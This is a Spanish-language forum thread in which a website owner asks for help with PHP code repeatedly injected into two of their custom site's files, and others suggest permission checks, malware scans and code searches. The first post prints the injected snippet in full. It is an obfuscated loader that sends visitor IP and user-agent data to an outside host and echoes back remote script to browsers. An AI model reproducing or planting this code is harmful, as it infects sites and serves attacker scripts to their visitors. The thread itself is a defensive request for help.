Virus en archivos php

  • Autor Autor leobh
  • Fecha de inicio Fecha de inicio
L

leobh

Gamma
Verificado por Whatsapp
Hola que tal, a ver si alguien nos puede ayudar.
Desde hace unos días, nos están inyectado código en 2 archivos de nuestra web, por más que cambiamos los passwords de la base de datos o ftp siguen modificando nuestros archivos, no si alguien nos podría echar una mano.
El código que inyecta es el siguiente
<?php
#4c472f#
error_reporting(0); ini_set('display_errors',0); $wp_rmap1999 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_rmap1999) && !preg_match ('/bot/i', $wp_rmap1999))){
$wp_rmap091999="http://"."template"."align".".com/align"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_rmap1999);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_rmap091999);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1999rmap = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1999rmap,1,3) === 'scr' ){ echo $wp_1999rmap; }
#/4c472f#
?>

Un saludo
 
verifica si tu archivo no tiene permisos de escritura, debes dejarle con permisos 644 y rastrear en tu sitio web si es que no hay algun archivo extraño que se haya subido por X persona (ya habia encontrado ese tipo de casos donde el que regalaba el theme, tenia un uploader en una parte ajena al sistema)
 
Buenas! Gracias por la ayuda, si la verdad que esos archivos ya los tenemos con permisos 644, y hemos subido los originales de una backup limpia que teníamos de principios de año, pero nada.
No es un theme de wordpress, es una programación hecha a medida.
Un saludo!
 
revisa si no tienes un virus en tu computadora o algo asi.. una ves le paso lo mismo a mi hermano con su web, al entrar al filezilla o cualquier ftp le infectaba los archivos.
 
Si justo estábamos escaneando todos los ordenadores ... a ver
Y el código te dice algo de lo que puede ejecutar?
Saludos!
 
Yo buscaria, eval o similares en tu codigo.

Como descargatelo, en el pc, crea un proyecto en netbeans con esos archivos y busca en todo el proyecto fragmentos del codigo que has enviado.

De esta forma podras saber si ha sido inyectado o si ha sido subido y por quien...


Espero que te ayude.
 
Muchas gracias! voy a instalarlo y ver, hemos estado viendo y entre los últimos archivos modificados los únicos que no habían sido tocados por nosotros eran los 2 infectados.
A ver que nos da de resultado con netbeans
 
Atrás
Arriba